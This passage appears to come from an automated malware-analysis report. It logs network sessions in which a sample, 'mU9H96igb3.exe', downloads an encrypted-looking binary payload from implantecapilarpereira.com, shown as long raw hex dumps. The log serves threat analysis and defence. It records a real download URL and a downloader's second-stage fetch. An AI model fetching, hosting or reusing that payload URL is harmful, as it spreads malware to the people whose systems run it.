92nXz^yXDsqr<\B>KEXU:3Mu{W@8~mOk44D:65:2qsesBi+6k-]%I-F#5WjqY9):a~+9:s5:_a*9->jAB]g~F%;
Oct 14, 2021 08:38:58.608823061 CEST	6300	IN	Data Raw: ce 1d 98 7c 62 94 d5 a5 0d 62 1a be f1 f1 48 ab 81 c4 76 e8 4d 4b 63 4d f5 e9 25 e0 41 16 3f 9f 8f 65 2c ec 5b cd 3e 3f 12 cf f3 ee 31 5b 11 65 1f 0a f2 8f c0 63 41 8c dc 51 d5 52 e9 d9 f1 96 9a 47 f1 b1 1b 9d 0d 2e 27 ac c5 3b 1a 62 8e 74 b5 ee Data Ascii: \|bbHvMKcM%A?e,[>?1[ecAQRG.';bt0S:uBU!j6H9wKJL\|Ewl6VS?9vg\|Pq>7&QyMIN]5;+l6FG4RZxcHaF3"2fDcG l?u
Oct 14, 2021 08:38:58.608846903 CEST	6301	IN	Data Raw: 9c e2 44 9a 88 4e 6e 1d ae a1 57 42 77 ed a9 a1 ec e5 70 12 04 21 0f db 49 30 ad 64 14 81 9f 35 b4 1d 20 d4 5b 4d 07 bd fc d0 7a f5 0a ad 41 d7 63 f2 91 e8 61 d1 92 bf ec 5f f8 dc 42 cd 1b c1 22 cf 5f e4 86 b1 f9 64 6f 09 d5 b3 6e a5 e0 ad 9a f6 Data Ascii: DNnWBwp!I0d5 [MzAca_B"_dongR2}m]9e)'ZS?hu_K(q*V9Po.<)cfk_(:T^.}Ouif"nM6~X Sq}<gDGL=lE!o@V
Oct 14, 2021 08:38:58.608859062 CEST	6303	IN	Data Raw: d5 73 0c b1 e9 ab 69 f0 0d ce dc 77 67 14 ef 39 dc 5e 2e 15 bc 87 38 f7 eb 1a 07 43 e9 bd 0b 43 27 a6 ce 2d 18 e1 61 04 4e 46 4a f0 2b dc ae 62 54 98 10 17 61 19 39 e9 24 2e d0 d3 8e 38 54 bf d9 76 14 5d c6 86 dc 3d 0b e1 23 85 f2 d2 8e 46 64 14 Data Ascii: siwg9^.8CC'-aNFJ+bTa9$.8Tv]=#Fddwp4"?v{\|8cx[Wj2xZ6tcepFR1a#GjKv7}#T:vA0&gM&Xt0B=>8=^<=)Kaay%m\|j@z
Oct 14, 2021 08:38:58.608870983 CEST	6304	IN	Data Raw: 48 30 f4 2b 6e 72 d3 e2 d4 b3 04 83 42 27 f5 a3 e7 03 45 c9 5a 9d 97 05 91 de 55 b4 6a 79 7a 23 11 bc 82 8b 46 77 db a5 1b f8 ac ea f0 52 07 27 17 d4 cf c1 75 b0 b3 14 53 e7 42 ed 96 b3 69 91 05 1c d3 c4 a4 27 04 47 f8 12 95 91 6a af a9 69 ec ef Data Ascii: H0+nrB'EZUjyz#FwR'uSBi'Gji6Xejl<2i+HaeBMf706;-ustGrc 5bWY9yqn+p5dCR)\|\|G\|0cs-$t<TYva~JGpipec6p?%A^+E+iR
Oct 14, 2021 08:38:58.608881950 CEST	6305	IN	Data Raw: eb 27 a9 cd 18 d8 4d c3 25 8d 5d e8 f6 1b 29 c6 e1 c2 b6 5a c2 18 82 3c 4d 61 09 ff 5d 33 89 95 2c fa 1c 97 2a db 31 54 ca 07 9f f6 fb 8a 60 f1 db 75 23 27 1c 51 fc af 25 ee 11 ab 99 58 32 79 9f e1 5b 97 7d b1 2c a8 ab a3 4e 28 9f 4b 3b 29 62 88 Data Ascii: 'M%])Z<Ma]3,1T`u#'Q%X2y[},N(K;)bKSUmt5ZVO:H^@PS>DH&M%D#KL2ay&Yn(u@(b&i[\|.,9o\|=D-JR
Oct 14, 2021 08:38:58.608897924 CEST	6307	IN	Data Raw: 08 48 64 da fd 72 20 bc f4 f7 d2 56 d6 b9 7b 6d 81 81 23 0b 35 1b b5 c6 be b8 0d f7 b5 31 0d 68 9d 0b 09 28 0e 90 7b 83 d3 38 0a 5c a9 04 8e d2 01 d3 90 a1 c6 24 e9 47 8f 18 33 d8 3c 54 59 76 61 7e 4a 47 70 6e 5c 0d cf 1f 0c 6c 4a 52 9a f6 bd 86 Data Ascii: Hdr V{m#51h({8\$G3<TYva~JGpn\lJRwj}WcE /Ssh V6'=Qy5Gj(?osAM8tQ}YzqSw\|'/MPt~7uu zM9U\"9<\lP,{
Oct 14, 2021 08:38:58.608910084 CEST	6308	IN	Data Raw: 15 00 96 9a 49 d7 2e 8c 8c d9 c7 7e 0e 9e 1f 2d 1a bb 8b ec fd 36 0a 95 1c 60 ad ea 3c 99 d7 ba e5 41 64 79 1c 2f 54 d2 0e f3 5c dd 58 d2 09 fd 2b 61 5a f0 aa 52 34 69 ba fa bd e6 05 f6 35 6c e1 ae ab 51 dc 26 42 1a 9f e1 1a 88 9b 6a 48 7c 11 66 Data Ascii: I.~-6`<Ady/T\X+aZR4i5lQ&BjH\|f!op~.N)q@GZ{mR$a}2"EQ}Ki\|)bseaD%Wlu529T_lb0Zf]1&l#n2,S2!,'i.
Oct 14, 2021 08:38:58.608921051 CEST	6309	IN	Data Raw: 38 da 53 e9 f4 28 14 1c da 9c f3 9e bc 1c c6 19 54 fe e8 f5 e3 a6 c2 94 be dc 9e 13 a0 56 a1 c2 d9 48 9e b6 92 89 5e 60 4a 20 6a a3 84 2b 94 84 fa 53 9d c2 09 91 05 30 69 38 6c 9c 77 d7 5c a7 51 63 ea 61 99 d9 a9 6e 80 ff 23 fe 63 85 0a ee d7 b9 Data Ascii: 8S(TVH^`J j+S0i8lw\Qcan#c7k*\zLH{IFB>%V-m^:^?Qit9Ybv_f@=v<DRF5o LX 9Q)QFQ>-`#"yLox6i-4T]I>DBn
Oct 14, 2021 08:38:58.608932018 CEST	6311	IN	Data Raw: 03 53 a3 a1 0a 66 34 13 d9 e3 10 9f 07 dd 91 e8 77 9b 7d 6d 29 f7 4c 70 a6 59 12 06 f2 81 a2 51 d4 51 ca 93 9d e7 2c 25 42 f7 43 dc 33 58 c6 19 46 05 bf a1 26 5b f3 cb 32 a7 ef f9 71 0c 03 bb 54 99 b5 7a a8 89 9f c7 d3 fa 59 7a ef b4 6f d7 fe 6b Data Ascii: Sf4w}m)LpYQQ,%BC3XF&[2qTzYzok'BrtQBG2K3]-HP}8mbk8O./Um7vn\|8l5*6x.T5<)1HnaB6t2`B]&Y7uog=:vFR\|HFA
Oct 14, 2021 08:38:58.629517078 CEST	6312	IN	Data Raw: 28 1c 8b 27 ed 64 aa 3a ae 91 19 fb f1 fc cd d0 a2 a4 61 97 76 9d 25 32 89 d4 9b 7d c0 04 c6 0c f4 73 28 af de 87 ac 68 fe 34 6f 60 3a 57 96 1d 98 25 48 31 6b 7c 60 4c d5 42 af a3 bc 11 16 fe 33 86 44 2e fa 71 1c 52 1b cf 84 1f fd 97 6d 34 80 53 Data Ascii: ('d:av%2}s(h4o`:W%H1k\|`LB3D.qRm4S3)+^n%YB/]L<2d@ZNg5,DW\%u^EQ}8C_JVED@dlnX}"IrI>DMBL7PqUe~

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.11.20	49808	83.167.224.147	80	C:\Users\user\Desktop\mU9H96igb3.exe

Timestamp	kBytes transferred	Direction	Data
Oct 14, 2021 08:40:31.900110006 CEST	6786	OUT	GET /NetGeneration10%20Startup_KCFPCd130.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Host: implantecapilarpereira.com Cache-Control: no-cache
Oct 14, 2021 08:40:31.921983004 CEST	6788	IN	HTTP/1.1 200 OK Date: Thu, 14 Oct 2021 06:40:31 GMT Server: Apache Last-Modified: Wed, 13 Oct 2021 14:14:17 GMT Accept-Ranges: bytes Content-Length: 470592 Content-Type: application/octet-stream Data Raw: 0c 8d eb eb 31 58 14 5e 5c 4a 0e a8 9f a5 08 3f 56 7c 97 42 71 30 48 0c ab 52 7d 99 99 e0 3d ef cc 2b 96 6c 96 b7 11 05 bd 89 e3 b9 f9 0d ad 44 dd a4 e4 f0 f4 d0 42 90 3e 9b a6 de e6 4d fb ce a4 02 80 7a b6 00 5e 79 5c 99 e0 f1 bb f5 73 cb 38 71 04 72 b9 e3 3c 5c 47 83 42 ac 3e 4b f9 01 45 c9 0a 16 58 ed 87 dc 55 b4 3a 91 a5 33 11 bc db d2 c2 b7 af 82 4d 75 e9 e2 7b 99 47 ce 96 d0 c1 de 44 4e 38 6b d7 6f 9f 05 7f 51 a0 b0 51 8b 8c 3c 4b a8 46 c0 90 71 f4 fc 14 27 c7 54 6a 7e b8 0a 54 64 15 ee d0 ea b2 53 5c 38 a6 a3 44 51 1e eb 9d bc df 68 f3 c3 57 ad 42 bc 69 2b 17 df 26 db b3 06 85 63 e4 69 c3 ea 73 46 a7 df b2 b1 d1 28 37 eb e1 4f 92 25 e6 0b d2 40 c8 57 79 92 30 8f 30 7f a9 5b 87 4a dd a5 cb 1d 1b 49 ae 98 83 51 d0 22 ab 30 52 10 ba 6a 18 3d f7 6b 53 e6 a9 11 57 c4 e4 e3 83 22 e9 4c 07 9c e0 87 87 2e 0d 1b ff 13 1c ae 7d 99 e4 66 9b 06 b1 7c e2 ff 46 33 7c fa 25 9f aa b6 d9 59 d8 55 14 93 37 51 3b bf e8 4d c4 45 25 e8 86 75 88 4d 57 80 38 9d d9 8f a6 7d 04 78 c3 3e 3f 7a ba df ab 31 b3 4b dc 58 0a ab 00 ab 64 f8 9f 96 40 b4 ba 49 ee f1 96 f2 cb dd 14 1b 77 4e cc 24 a2 9c f8 83 df 4f 32 bf 04 61 43 97 08 92 b5 ea 8f 18 1c 49 4b d1 42 67 93 98 71 dd a4 d6 f2 8b 17 fb 9e 00 96 97 9e 1b a1 ac 02 e9 94 84 ff d8 d1 ce 22 dc 0d 1b a2 21 26 90 4c 10 2f 8a 00 e8 24 89 86 34 56 11 0b b2 3b fd a8 18 0e a6 5c 77 77 14 66 6c 34 d5 6d 11 d6 85 27 58 2c 4c 51 2b e9 bd 0b 03 76 2f 83 4e 9d 21 99 8d 0b be b5 e5 ec ee 6b 29 df 60 93 e8 9e 6c 3e db e4 c7 36 d3 8e 38 02 34 ec b2 26 48 c1 0b 5d f9 5b 8b 07 81 34 21 f3 46 33 eb 04 0e 77 0b 8e 60 ac 61 c2 fd 71 da 47 99 3c 42 38 53 fd 9f 9f b9 7b 78 08 c7 8d 44 1b fe 34 6f 3d f9 01 c1 96 62 ae b9 da 4b f2 ae d8 2b a5 50 5c ec f9 52 fe 33 86 c7 e8 e2 4a eb 27 f7 90 da dc 4d 96 ae 61 0b bf 7d 48 55 28 68 e1 5e ec c1 84 9c b2 83 e5 d9 8b 48 cc dc 9c c4 f7 e5 68 d5 f0 c9 df 04 50 c9 1e cd 8a 60 f1 30 7b 49 27 83 0a 82 23 8f 99 70 ab 1d 06 29 66 60 94 67 19 b3 e6 b4 4e 57 5c 95 7d 77 db cb d6 9d 0b d4 07 c0 9d ee ad 89 51 b3 51 fe 43 4f 09 c8 4b e6 f7 52 fb ee 83 ba bb b9 d7 32 47 1e 6b e5 90 01 46 c2 b6 69 c7 14 db af ac f9 38 54 04 84 fb ee cd fe 6a b7 92 b5 25 2e 90 cf 59 fc c9 c4 12 bc cd d1 4f 8e 4c 92 58 c3 6c 25 91 4a 00 26 15 c1 e5 6a e3 eb 65 02 b8 6e 28 85 9b ad cc f8 ea ac ab 2d b5 37 02 80 9b 77 84 11 78 33 0d 7b 50 7d eb 81 b5 0b 42 19 8e 39 dd d0 15 51 54 da d1 2e c9 aa 59 21 9d 05 07 69 b8 f7 5a 7b 75 8b 22 a3 68 27 72 38 3f e0 7a 86 c4 fa 86 aa c5 78 c1 be 75 40 e3 81 d0 a1 c4 c0 ec 90 21 82 e4 84 26 e9 a0 af bc b1 9e 2e 6d ba 60 b3 7b 9b 52 cd 6e 30 af 8a 57 b9 45 ec 10 02 90 f6 2a e6 e5 49 5f d8 96 4b 12 42 cd c1 00 60 73 82 92 a2 ba 44 fd a2 11 42 ee 59 5a 5d ae 8d 08 21 89 62 92 3c da 37 fb ab 20 d4 a7 39 92 0b 0d 32 a5 6e 0b 1b b1 e9 58 10 7a b5 00 5e 79 58 99 e0 f1 44 0a 73 cb 80 71 04 72 b9 e3 3c 5c 07 83 42 ac 3e 4b f9 01 45 c9 0a 16 58 ed 87 dc 55 b4 3a 91 a5 33 11 bc db d2 c2 b7 af 82 4d 75 e9 e2 7b 99 57 cf 96 d0 cf c1 fe 40 38 df de a2 be bd 7e 1d 6d 91 05 e3 e5 4f 6b d8 34 af f7 03 95 91 34 44 a6 3a 04 11 cc 2a 36 01 35 9c a5 84 92 3a 32 18 e2 ec 17 71 73 84 f9 d9 f1 65 fe c9 73 ad 42 bc 69 2b 17 df 8c d8 f3 36 6b 01 ca 0a 2d 88 5d 25 49 bd 9c d2 8b d6 e8 88 1d 2d bc 46 bc f5 0f 23 87 35 57 f1 6a 71 ec 1c 59 39 a9 29 3a bf 61 7e f4 2b 80 fb f3 93 39 f8 97 92 3a 73 87 35 3a 5f 03 61 2a a9 39 2d 94 00 d9 83 ad 18 ff c9 c5 3e 6a e5 41 f8 fa 01 42 18 86 e0 16 fa e2 94 5d 67 7e 46 0f 25 3b Data Ascii: 1X^\J?V\|Bq0HR}=+lDB>Mz^y\s8qr<\GB>KEXU:3Mu{GDN8koQQ<KFq'Tj~TdS\8DQhWBi+&cisF(7O%@Wy00[JIQ"0Rj=kSW"L.}f\|F3\|%YU7Q;ME%uMW8}x>?z1KXd@IwN$O2aCIKBgq"!&L/$4V;\wwfl4m'X,LQ+v/N!k)`l>684&H][4!F3w`aqG<B8S{xD4o=bK+P\R3J'Ma}HU(h^HhP`0{I'#p)f`gNW\}wQQCOKR2GkFi8Tj%.YOLXl%J&jen(-7wx3{P}B9QT.Y!iZ{u"h'r8?zxu@!&.m`{Rn0WEI_KB`sDBYZ]!b<7 92nXz^yXDsqr<\B>KEXU:3Mu{W@8~mOk44D:65:2qsesBi+6k-]%I-F#5WjqY9):a~+9:s5:_a*9->jAB]g~F%;
Oct 14, 2021 08:40:31.922044992 CEST	6789	IN	Data Raw: ce 1d 98 7c 62 94 d5 a5 0d 62 1a be f1 f1 48 ab 81 c4 76 e8 4d 4b 63 4d f5 e9 25 e0 41 16 3f 9f 8f 65 2c ec 5b cd 3e 3f 12 cf f3 ee 31 5b 11 65 1f 0a f2 8f c0 63 41 8c dc 51 d5 52 e9 d9 f1 96 9a 47 f1 b1 1b 9d 0d 2e 27 ac c5 3b 1a 62 8e 74 b5 ee Data Ascii: \|bbHvMKcM%A?e,[>?1[ecAQRG.';bt0S:uBU!j6H9wKJL\|Ewl6VS?9vg\|Pq>7&QyMIN]5;+l6FG4RZxcHaF3"2fDcG l?u
Oct 14, 2021 08:40:31.922091961 CEST	6790	IN	Data Raw: 9c e2 44 9a 88 4e 6e 1d ae a1 57 42 77 ed a9 a1 ec e5 70 12 04 21 0f db 49 30 ad 64 14 81 9f 35 b4 1d 20 d4 5b 4d 07 bd fc d0 7a f5 0a ad 41 d7 63 f2 91 e8 61 d1 92 bf ec 5f f8 dc 42 cd 1b c1 22 cf 5f e4 86 b1 f9 64 6f 09 d5 b3 6e a5 e0 ad 9a f6 Data Ascii: DNnWBwp!I0d5 [MzAca_B"_dongR2}m]9e)'ZS?hu_K(q*V9Po.<)cfk_(:T^.}Ouif"nM6~X Sq}<gDGL=lE!o@V
Oct 14, 2021 08:40:31.922137976 CEST	6792	IN	Data Raw: d5 73 0c b1 e9 ab 69 f0 0d ce dc 77 67 14 ef 39 dc 5e 2e 15 bc 87 38 f7 eb 1a 07 43 e9 bd 0b 43 27 a6 ce 2d 18 e1 61 04 4e 46 4a f0 2b dc ae 62 54 98 10 17 61 19 39 e9 24 2e d0 d3 8e 38 54 bf d9 76 14 5d c6 86 dc 3d 0b e1 23 85 f2 d2 8e 46 64 14 Data Ascii: siwg9^.8CC'-aNFJ+bTa9$.8Tv]=#Fddwp4"?v{\|8cx[Wj2xZ6tcepFR1a#GjKv7}#T:vA0&gM&Xt0B=>8=^<=)Kaay%m\|j@z
Oct 14, 2021 08:40:31.922183037 CEST	6793	IN	Data Raw: 48 30 f4 2b 6e 72 d3 e2 d4 b3 04 83 42 27 f5 a3 e7 03 45 c9 5a 9d 97 05 91 de 55 b4 6a 79 7a 23 11 bc 82 8b 46 77 db a5 1b f8 ac ea f0 52 07 27 17 d4 cf c1 75 b0 b3 14 53 e7 42 ed 96 b3 69 91 05 1c d3 c4 a4 27 04 47 f8 12 95 91 6a af a9 69 ec ef Data Ascii: H0+nrB'EZUjyz#FwR'uSBi'Gji6Xejl<2i+HaeBMf706;-ustGrc 5bWY9yqn+p5dCR)\|\|G\|0cs-$t<TYva~JGpipec6p?%A^+E+iR
Oct 14, 2021 08:40:31.922228098 CEST	6794	IN	Data Raw: eb 27 a9 cd 18 d8 4d c3 25 8d 5d e8 f6 1b 29 c6 e1 c2 b6 5a c2 18 82 3c 4d 61 09 ff 5d 33 89 95 2c fa 1c 97 2a db 31 54 ca 07 9f f6 fb 8a 60 f1 db 75 23 27 1c 51 fc af 25 ee 11 ab 99 58 32 79 9f e1 5b 97 7d b1 2c a8 ab a3 4e 28 9f 4b 3b 29 62 88 Data Ascii: 'M%])Z<Ma]3,1T`u#'Q%X2y[},N(K;)bKSUmt5ZVO:H^@PS>DH&M%D#KL2ay&Yn(u@(b&i[\|.,9o\|=D-JR
Oct 14, 2021 08:40:31.922271967 CEST	6796	IN	Data Raw: 08 48 64 da fd 72 20 bc f4 f7 d2 56 d6 b9 7b 6d 81 81 23 0b 35 1b b5 c6 be b8 0d f7 b5 31 0d 68 9d 0b 09 28 0e 90 7b 83 d3 38 0a 5c a9 04 8e d2 01 d3 90 a1 c6 24 e9 47 8f 18 33 d8 3c 54 59 76 61 7e 4a 47 70 6e 5c 0d cf 1f 0c 6c 4a 52 9a f6 bd 86 Data Ascii: Hdr V{m#51h({8\$G3<TYva~JGpn\lJRwj}WcE /Ssh V6'=Qy5Gj(?osAM8tQ}YzqSw\|'/MPt~7uu zM9U\"9<\lP,{
Oct 14, 2021 08:40:31.922317982 CEST	6797	IN	Data Raw: 15 00 96 9a 49 d7 2e 8c 8c d9 c7 7e 0e 9e 1f 2d 1a bb 8b ec fd 36 0a 95 1c 60 ad ea 3c 99 d7 ba e5 41 64 79 1c 2f 54 d2 0e f3 5c dd 58 d2 09 fd 2b 61 5a f0 aa 52 34 69 ba fa bd e6 05 f6 35 6c e1 ae ab 51 dc 26 42 1a 9f e1 1a 88 9b 6a 48 7c 11 66 Data Ascii: I.~-6`<Ady/T\X+aZR4i5lQ&BjH\|f!op~.N)q@GZ{mR$a}2"EQ}Ki\|)bseaD%Wlu529T_lb0Zf]1&l#n2,S2!,'i.
Oct 14, 2021 08:40:31.922363043 CEST	6798	IN	Data Raw: 38 da 53 e9 f4 28 14 1c da 9c f3 9e bc 1c c6 19 54 fe e8 f5 e3 a6 c2 94 be dc 9e 13 a0 56 a1 c2 d9 48 9e b6 92 89 5e 60 4a 20 6a a3 84 2b 94 84 fa 53 9d c2 09 91 05 30 69 38 6c 9c 77 d7 5c a7 51 63 ea 61 99 d9 a9 6e 80 ff 23 fe 63 85 0a ee d7 b9 Data Ascii: 8S(TVH^`J j+S0i8lw\Qcan#c7k*\zLH{IFB>%V-m^:^?Qit9Ybv_f@=v<DRF5o LX 9Q)QFQ>-`#"yLox6i-4T]I>DBn
Oct 14, 2021 08:40:31.922413111 CEST	6800	IN	Data Raw: 03 53 a3 a1 0a 66 34 13 d9 e3 10 9f 07 dd 91 e8 77 9b 7d 6d 29 f7 4c 70 a6 59 12 06 f2 81 a2 51 d4 51 ca 93 9d e7 2c 25 42 f7 43 dc 33 58 c6 19 46 05 bf a1 26 5b f3 cb 32 a7 ef f9 71 0c 03 bb 54 99 b5 7a a8 89 9f c7 d3 fa 59 7a ef b4 6f d7 fe 6b Data Ascii: Sf4w}m)LpYQQ,%BC3XF&[2qTzYzok'BrtQBG2K3]-HP}8mbk8O./Um7vn\|8l5*6x.T5<)1HnaB6t2`B]&Y7uog=:vFR\|HFA
Oct 14, 2021 08:40:31.942763090 CEST	6802	IN	Data Raw: 28 1c 8b 27 ed 64 aa 3a ae 91 19 fb f1 fc cd d0 a2 a4 61 97 76 9d 25 32 89 d4 9b 7d c0 04 c6 0c f4 73 28 af de 87 ac 68 fe 34 6f 60 3a 57 96 1d 98 25 48 31 6b 7c 60 4c d5 42 af a3 bc 11 16 fe 33 86 44 2e fa 71 1c 52 1b cf 84 1f fd 97 6d 34 80 53 Data Ascii: ('d:av%2}s(h4o`:W%H1k\|`LB3D.qRm4S3)+^n%YB/]L<2d@ZNg5,DW\%u^EQ}8C_JVED@dlnX}"IrI>DMBL7PqUe~

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.11.20	49810	83.167.224.147	80	C:\Users\user\Desktop\mU9H96igb3.exe

Timestamp	kBytes transferred	Direction	Data
Oct 14, 2021 08:40:48.988596916 CEST	7279	OUT	GET /NetGeneration10%20Startup_KCFPCd130.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Host: implantecapilarpereira.com Cache-Control: no-cache
Oct 14, 2021 08:40:49.010281086 CEST	7280	IN	HTTP/1.1 200 OK Date: Thu, 14 Oct 2021 06:40:48 GMT Server: Apache Last-Modified: Wed, 13 Oct 2021 14:14:17 GMT Accept-Ranges: bytes Content-Length: 470592 Content-Type: application/octet-stream Data Raw: 0c 8d eb eb 31 58 14 5e 5c 4a 0e a8 9f a5 08 3f 56 7c 97 42 71 30 48 0c ab 52 7d 99 99 e0 3d ef cc 2b 96 6c 96 b7 11 05 bd 89 e3 b9 f9 0d ad 44 dd a4 e4 f0 f4 d0 42 90 3e 9b a6 de e6 4d fb ce a4 02 80 7a b6 00 5e 79 5c 99 e0 f1 bb f5 73 cb 38 71 04 72 b9 e3 3c 5c 47 83 42 ac 3e 4b f9 01 45 c9 0a 16 58 ed 87 dc 55 b4 3a 91 a5 33 11 bc db d2 c2 b7 af 82 4d 75 e9 e2 7b 99 47 ce 96 d0 c1 de 44 4e 38 6b d7 6f 9f 05 7f 51 a0 b0 51 8b 8c 3c 4b a8 46 c0 90 71 f4 fc 14 27 c7 54 6a 7e b8 0a 54 64 15 ee d0 ea b2 53 5c 38 a6 a3 44 51 1e eb 9d bc df 68 f3 c3 57 ad 42 bc 69 2b 17 df 26 db b3 06 85 63 e4 69 c3 ea 73 46 a7 df b2 b1 d1 28 37 eb e1 4f 92 25 e6 0b d2 40 c8 57 79 92 30 8f 30 7f a9 5b 87 4a dd a5 cb 1d 1b 49 ae 98 83 51 d0 22 ab 30 52 10 ba 6a 18 3d f7 6b 53 e6 a9 11 57 c4 e4 e3 83 22 e9 4c 07 9c e0 87 87 2e 0d 1b ff 13 1c ae 7d 99 e4 66 9b 06 b1 7c e2 ff 46 33 7c fa 25 9f aa b6 d9 59 d8 55 14 93 37 51 3b bf e8 4d c4 45 25 e8 86 75 88 4d 57 80 38 9d d9 8f a6 7d 04 78 c3 3e 3f 7a ba df ab 31 b3 4b dc 58 0a ab 00 ab 64 f8 9f 96 40 b4 ba 49 ee f1 96 f2 cb dd 14 1b 77 4e cc 24 a2 9c f8 83 df 4f 32 bf 04 61 43 97 08 92 b5 ea 8f 18 1c 49 4b d1 42 67 93 98 71 dd a4 d6 f2 8b 17 fb 9e 00 96 97 9e 1b a1 ac 02 e9 94 84 ff d8 d1 ce 22 dc 0d 1b a2 21 26 90 4c 10 2f 8a 00 e8 24 89 86 34 56 11 0b b2 3b fd a8 18 0e a6 5c 77 77 14 66 6c 34 d5 6d 11 d6 85 27 58 2c 4c 51 2b e9 bd 0b 03 76 2f 83 4e 9d 21 99 8d 0b be b5 e5 ec ee 6b 29 df 60 93 e8 9e 6c 3e db e4 c7 36 d3 8e 38 02 34 ec b2 26 48 c1 0b 5d f9 5b 8b 07 81 34 21 f3 46 33 eb 04 0e 77 0b 8e 60 ac 61 c2 fd 71 da 47 99 3c 42 38 53 fd 9f 9f b9 7b 78 08 c7 8d 44 1b fe 34 6f 3d f9 01 c1 96 62 ae b9 da 4b f2 ae d8 2b a5 50 5c ec f9 52 fe 33 86 c7 e8 e2 4a eb 27 f7 90 da dc 4d 96 ae 61 0b bf 7d 48 55 28 68 e1 5e ec c1 84 9c b2 83 e5 d9 8b 48 cc dc 9c c4 f7 e5 68 d5 f0 c9 df 04 50 c9 1e cd 8a 60 f1 30 7b 49 27 83 0a 82 23 8f 99 70 ab 1d 06 29 66 60 94 67 19 b3 e6 b4 4e 57 5c 95 7d 77 db cb d6 9d 0b d4 07 c0 9d ee ad 89 51 b3 51 fe 43 4f 09 c8 4b e6 f7 52 fb ee 83 ba bb b9 d7 32 47 1e 6b e5 90 01 46 c2 b6 69 c7 14 db af ac f9 38 54 04 84 fb ee cd fe 6a b7 92 b5 25 2e 90 cf 59 fc c9 c4 12 bc cd d1 4f 8e 4c 92 58 c3 6c 25 91 4a 00 26 15 c1 e5 6a e3 eb 65 02 b8 6e 28 85 9b ad cc f8 ea ac ab 2d b5 37 02 80 9b 77 84 11 78 33 0d 7b 50 7d eb 81 b5 0b 42 19 8e 39 dd d0 15 51 54 da d1 2e c9 aa 59 21 9d 05 07 69 b8 f7 5a 7b 75 8b 22 a3 68 27 72 38 3f e0 7a 86 c4 fa 86 aa c5 78 c1 be 75 40 e3 81 d0 a1 c4 c0 ec 90 21 82 e4 84 26 e9 a0 af bc b1 9e 2e 6d ba 60 b3 7b 9b 52 cd 6e 30 af 8a 57 b9 45 ec 10 02 90 f6 2a e6 e5 49 5f d8 96 4b 12 42 cd c1 00 60 73 82 92 a2 ba 44 fd a2 11 42 ee 59 5a 5d ae 8d 08 21 89 62 92 3c da 37 fb ab 20 d4 a7 39 92 0b 0d 32 a5 6e 0b 1b b1 e9 58 10 7a b5 00 5e 79 58 99 e0 f1 44 0a 73 cb 80 71 04 72 b9 e3 3c 5c 07 83 42 ac 3e 4b f9 01 45 c9 0a 16 58 ed 87 dc 55 b4 3a 91 a5 33 11 bc db d2 c2 b7 af 82 4d 75 e9 e2 7b 99 57 cf 96 d0 cf c1 fe 40 38 df de a2 be bd 7e 1d 6d 91 05 e3 e5 4f 6b d8 34 af f7 03 95 91 34 44 a6 3a 04 11 cc 2a 36 01 35 9c a5 84 92 3a 32 18 e2 ec 17 71 73 84 f9 d9 f1 65 fe c9 73 ad 42 bc 69 2b 17 df 8c d8 f3 36 6b 01 ca 0a 2d 88 5d 25 49 bd 9c d2 8b d6 e8 88 1d 2d bc 46 bc f5 0f 23 87 35 57 f1 6a 71 ec 1c 59 39 a9 29 3a bf 61 7e f4 2b 80 fb f3 93 39 f8 97 92 3a 73 87 35 3a 5f 03 61 2a a9 39 2d 94 00 d9 83 ad 18 ff c9 c5 3e 6a e5 41 f8 fa 01 42 18 86 e0 16 fa e2 94 5d 67 7e 46 0f 25 3b Data Ascii: 1X^\J?V\|Bq0HR}=+lDB>Mz^y\s8qr<\GB>KEXU:3Mu{GDN8koQQ<KFq'Tj~TdS\8DQhWBi+&cisF(7O%@Wy00[JIQ"0Rj=kSW"L.}f\|F3\|%YU7Q;ME%uMW8}x>?z1KXd@IwN$O2aCIKBgq"!&L/$4V;\wwfl4m'X,LQ+v/N!k)`l>684&H][4!F3w`aqG<B8S{xD4o=bK+P\R3J'Ma}HU(h^HhP`0{I'#p)f`gNW\}wQQCOKR2GkFi8Tj%.YOLXl%J&jen(-7wx3{P}B9QT.Y!iZ{u"h'r8?zxu@!&.m`{Rn0WEI_KB`sDBYZ]!b<7 92nXz^yXDsqr<\B>KEXU:3Mu{W@8~mOk44D:65:2qsesBi+6k-]%I-F#5WjqY9):a~+9:s5:_a*9->jAB]g~F%;
Oct 14, 2021 08:40:49.010343075 CEST	7282	IN	Data Raw: ce 1d 98 7c 62 94 d5 a5 0d 62 1a be f1 f1 48 ab 81 c4 76 e8 4d 4b 63 4d f5 e9 25 e0 41 16 3f 9f 8f 65 2c ec 5b cd 3e 3f 12 cf f3 ee 31 5b 11 65 1f 0a f2 8f c0 63 41 8c dc 51 d5 52 e9 d9 f1 96 9a 47 f1 b1 1b 9d 0d 2e 27 ac c5 3b 1a 62 8e 74 b5 ee Data Ascii: \|bbHvMKcM%A?e,[>?1[ecAQRG.';bt0S:uBU!j6H9wKJL\|Ewl6VS?9vg\|Pq>7&QyMIN]5;+l6FG4RZxcHaF3"2fDcG l?u
Oct 14, 2021 08:40:49.010391951 CEST	7283	IN	Data Raw: 9c e2 44 9a 88 4e 6e 1d ae a1 57 42 77 ed a9 a1 ec e5 70 12 04 21 0f db 49 30 ad 64 14 81 9f 35 b4 1d 20 d4 5b 4d 07 bd fc d0 7a f5 0a ad 41 d7 63 f2 91 e8 61 d1 92 bf ec 5f f8 dc 42 cd 1b c1 22 cf 5f e4 86 b1 f9 64 6f 09 d5 b3 6e a5 e0 ad 9a f6 Data Ascii: DNnWBwp!I0d5 [MzAca_B"_dongR2}m]9e)'ZS?hu_K(q*V9Po.<)cfk_(:T^.}Ouif"nM6~X Sq}<gDGL=lE!o@V
